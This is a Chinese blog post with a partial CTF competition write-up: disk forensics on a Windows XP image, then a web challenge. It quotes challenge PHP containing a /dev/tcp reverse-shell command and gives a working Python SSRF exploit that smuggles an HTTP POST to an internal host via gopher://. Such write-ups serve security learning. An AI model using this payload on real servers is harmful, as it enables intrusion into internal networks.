第二届网刃部分WP

最新推荐文章于 2024-07-04 09:24:51 发布
最新推荐文章于 2024-07-04 09:24:51 发布
阅读量588 收藏 1
点赞数 1
分类专栏: CTF比赛 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/justruofeng/article/details/124387390
版权

第二届网刃部分WP

玩坏的winxp

用VM打开附件时候打不开,后来用DiskGenius软件打开,发现桌面中存在有五张图片
在这里插入图片描述
在图片meiren.png中发现有隐藏压缩包
在这里插入图片描述
foremost分离文件,发现图片
在这里插入图片描述
010查看发现还有一层压缩包,再次分离发现压缩包有密码
在这里插入图片描述
发现f1ag图片中有提示
在这里插入图片描述
一想应该是qq,继续回到DiskGenius,在火狐浏览器的缓存文件中发现一堆.sqlite文件
在这里插入图片描述
下载下来
在这里插入图片描述
最后发现在places.sqlite中发现了记录
在这里插入图片描述
去搜索这个qq,查看空间在留言中发现一串md5:dc45445a8a099e63fbb9b8480d57723a
在这里插入图片描述
md5解密得到:xiaomin520
在这里插入图片描述
xiaomin520为压缩包密码,解开压缩包得到带有flag的图片
在这里插入图片描述
flag{this_is_what_u_want8}

Sign_in

参考极客大挑战2021中的where_is_my_FUMO

 <?php
    function chijou_kega_no_junnka($str) {
        $black_list = [">", ";", "|", "{", "}", "/", " "];
        return str_replace($black_list, "", $str);
    }
    
    
    if (isset($_GET['DATA'])) {
        $data = $_GET['DATA'];
        $addr = chijou_kega_no_junnka($data['ADDR']);
        $port = chijou_kega_no_junnka($data['PORT']);
        exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
    } else {
        highlight_file(__FILE__);
    }

利用gopher协议打,首先进行arp读表
在这里插入图片描述
找到两个ip,接着进行端口爆破,发现80端口可以利用,利用poc直接打

import urllib
import requests
import urllib.parse
import re

url = 'http://124.220.9.19:20001?url='
test = \
    """POST /?a HTTP/1.1
Host: 172.73.24.100:80
Referer:bolean.club
X-Forwarded-For:127.0.0.1
Content-Type:application/x-www-form-urlencoded
Content-Length:1

b
"""
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A', '%0D%0A')
result = '_' + new
result = urllib.parse.quote(result)
exp = 'gopher://172.73.24.100:80/' + result
response = requests.get(url=url + exp).text
flag = re.findall('</script>(.*?)hello,ctfer,welecome!!!!</body>', response)[0]
print(flag)

得到flag
在这里插入图片描述

七堇墨年
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
第二届网刃杯”网络安全大赛 部分writeup
ShenZ的博客
05-01 475
第二届网刃杯”网络安全大赛 部分writeup ICS easyiec web sign_in upload ez_java Misc 玩坏的winxp File协议读hosts,得到IP扫描内网,发现172.73.24.100有一台主机
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
第二届网刃部分wp
Sentiment的博客
04-26 2472
Sign_in 题目描述:炒鸡简单的签到题,玩的开心~~~~ 题目链接见附件,每个链接均可访问,环境5分钟重启一次。 file协议访问/etc/hosts,发现内网ip 扫描c段,发现127.73.23.100存活,需要GET传参一个a http://124.222.24.150:8091/?url=172.73.23.100 传a提示需要POST传b,这里的b,是指在172.73.23.100中传b,而当前host是:124.222.24.150,所以这里用到了gopher协议的POST传参 构造
2022第二届网刃杯writeup
04-25 981
文章目录MISC玩坏的winxpICSeasyiec喜欢移动的黑客carefulguyxyp07re定时启动ez_algorithmRe_functionfreestylewebSign_inuploadez_java 这次re做了4个,ICS做了3个,wp直接贴战队的了。 MISC 玩坏的winxp 1、虚拟机加载硬盘 2、Magnet AXIOM收集信息发现了网页浏览历史中的特殊网址。 3、meiren.png中两次binwalk可以得到一个需要密码才能解压的zip,并且提示寻找戴围脖的软件。 4、尝试
2022第二届网刃杯网络安全大赛部分wp
3tefanie丶zhou的博客
04-25 3631
【世间痴情男儿,不论地位高低,大抵都是喜欢女子便是错了,而且希望能一辈子知错不改】
第二届网刃杯web题复现
nareku的博客
06-22 196
1.upload 是很熟悉的upload题,按照惯例上传个木马看看 显然是对文件content-type的检验,用Bp抓包改包 回显文件存储路径,访问一下 发现并不解析php。看到题目说和sql注入有关,那么就浅浅找一下注入点 常规报错注入() 2.sign_in 知道是ssrf漏洞但是当时打的时候只想到传参/flag.txt,硬是找不到目录 看了wp才知道是ssrf+gopher协议 涨知识啦 1)goph.........
第二届网刃杯--部分Re
qq_45826388的博客
04-25 283
第二届网刃杯 Re wp
首届“网刃杯”网络安全大赛部分WP
qq_52988816的博客
11-19 2902
这是之前打比赛写的WP,供大家参考 藏在S7里的秘密 1.修复流量包 下载流量包打开后发现提示错报 The file"S7.pcap" isn’t a capture file in a format Wireshark understands. 所以我们找修复流量包的工具 http://f00l.de/hacking/pcapfix.php 修复完毕成功打开,审查流量包 藏在S7里的秘密 2.寻找有用信息 发现里面有PNG图片 尝试用tshark抓取出来 tshark -r C:\Users\XINO\D
全国大学生信息安全竞赛初赛writeup(历年CISCN真题与解析)
Hardworking666的博客
02-12 1万+
文章目录第十四届(2021年)第十三届(2020年)第十二届(2019年)第十届(2017年) 收录了大佬们参加全国大学生信息安全竞赛初赛的writeup,方便学习,排名不分先后,谨参考完整度和CSDN站内优先原则。 对大佬们的分享表示由衷的敬意和诚挚的感谢! 第十四届(2021年) 末 初——第十四届全国大学生信息安全竞赛-线上赛Writeup 作者:BL、Evan、PYozo、末初 编辑:白帽子社区运营团队——红色代码战队 第十四届全国大学生信息安全竞赛-线上赛Writeup 暗刃攻防实验室——2..
volatility安装、内存取证常见知识点及例题讲解(已进行2.1次更新)
热门推荐
mumuzi的博客
05-26 1万+
最近的CTF比赛有关内存取证、机器学习、流量分析的题越来越多,自己又没怎么下来学过,基本都混在简单基础的图片隐写上面,所以开坑整理内存取证的知识点,并选取两道例题来实操。之后也准备对机器学习开坑。 常见的内存镜像文件有raw、vmem、dmp、img等,这里就需要用到内存取证工具volatility(例题讲解使用版本为2.6),当然如果看见有个叫DumpIt的进程,不用去理会,他就是生成内存文件的程序。 指令讲解imageinfopslistpstreecmdscanconsolescmdlinefiles
第二届赣网杯WEB第一题WP.docx
12-06
2021第二届赣网杯WEB第一题WP
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
第二放映室用WP做的电影模板
06-04
【标题】"第二放映室用WP做的电影模板"揭示了一个基于WordPress(WP)构建的电影主题网站设计。WordPress是一个开源的内容管理系统(CMS),被广泛用于创建各种类型的网站,包括电影和娱乐类。这个模板可能是专门为...
2022年第四届长安杯66页最详细WP,零基础也能看懂
03-04
2022年第四届长安杯66页WP,零基础也能看懂, 检材的原始IP 检材1 172.16.80.133 网站前端页面 检材2 172.16.80.100 技术员PC电脑 检材3 172.16.80.128 网站后端数据库 2022长安杯案情背景:某地警方接到受害人报案...
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1213
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
JVM原理(十一):JVM虚拟机六种必需对类进行初始化的情况
zuodingquan666的博客
07-03 498
Java虚拟机把描述类的数据从Class文件加载到内存,并对数据进行校验、转换解析和初始化,最终形成可以被虚拟机直接使用的Java类型,这个过程被称作虚拟机的类加载机制。Java天生可以动态扩展的语言特性就是依赖运行期间动态加载和动态链接这个特点实现的。
java 程序、进程 、线程,cpu,并行、并发、启动线程两种方式
gu2022_3_5_21_23的博客
07-02 305
Thread 方式 线程间不可以共享数据,除非变量加 static 变为 静态变量 (每次创建实例,会有一个新的副本)。条件二: 重写 Thread 父类方法 后创建实例调用 start 方法 (创建匿名子类的匿名对象)条件一: 将创建自实现 Runable 接口后的实例 作为参数传递给 Thread 的构造方法。2、将创建自实现 Runable 接口后的实例 作为参数传递给 Thread 的构造方法。最后调用的都是 Thread 的start 的方法。创建的线程对象,都是Thread类或其子类的实例。
ShardingSphere
最新发布
Casual_Lei的博客
07-04 620
ShardingSphere 通过提供数据分片、分布式事务、数据加密和读写分离等功能,帮助开发者轻松构建高性能、高可用的分布式数据库系统。其灵活的架构设计和丰富的功能模块,使其成为现代分布式数据库中间件的优秀选择。
陇剑杯线下网络防御wp
10-06
陇剑杯线下网络防御wp是一项网络安全竞赛,旨在培养和提升网络安全人才的技术能力和实战经验。该比赛由陇剑网络实验室主办,参赛者需要通过线下实战模拟来解决实际的网络攻防问题。 该比赛的wp,即“Write-up”,是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七堇墨年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值